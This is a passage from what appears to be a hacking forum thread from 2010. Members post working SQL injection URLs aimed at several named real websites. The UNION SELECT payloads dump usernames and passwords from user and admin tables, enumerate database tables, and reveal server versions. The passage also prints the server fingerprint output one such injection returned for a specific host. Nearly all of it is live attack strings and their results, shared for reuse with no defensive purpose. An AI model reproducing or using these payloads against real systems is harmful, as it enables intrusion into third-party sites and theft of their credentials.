,0x65,0x3a,0x20,@@time_zone,0x20,0x5d%29--

    [Machine: i386 ] --- [OS : portbld-freebsd6.3 ] --- [ DB Version: 5.0.90 ] --- [ Version Comment: FreeBSD port: mysql-server-5.0.90 ] --- [ System User: root@localhost ] --- [ Hostname: ruslana.ua ] --- [ DataDir: /var/db/mysql/ ] --- [ Basedir: /usr/local/ ] --- [ tmp Dir: /var/tmp/ ] --- [ Database: ruslana ] --- [ Storage Engine: MyISAM ] --- [ SQL Warnings: 0 ] --- [ Server ID: 1 ] --- [ License: GPL ] --- [ Secure Auth: 0 ] --- [ Expire Logs Days: 0 ] --- [ Log Warnings: 1 ] --- [ System Time Zone: UTC] ----- [ Time Zone: SYSTEM ]
     
    #11978 Iron47, 5 May 2010
    Last edited: 5 May 2010
    1 person likes this.
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.bcspeakers.com/product.php?id=-0000000046+union+select+1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12,13,14,15+from+_user--

    http://www.estaciontierra.com/artistas/artista.php?id=-164+union+select+1,2,3,4,5,user(),7,8,9,@@version_compile_os,11,database(),version(),14--

    http://www.webjournal.unior.it/Articoli.php?IdVolume=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(name,char(58),password)+from+admin--
     
    _________________________
    #11979 Konqi, 5 May 2010
    Last edited: 5 May 2010
  20. err0rFrost

    err0rFrost Elder - Старейшина

    Joined:
    31 Mar 2005
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.databankgroup.com/index1.php?linkid=-999+union+SELECT+GROUP_CONCAT(table_name)+FROM+information_schema.tables--
    
    pr5

    Code:
    http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9/*
    
    pr6
     
    #11980 err0rFrost, 5 May 2010
    Last edited: 5 May 2010
    1 person likes this.
Thread Status:
Not open for further replies.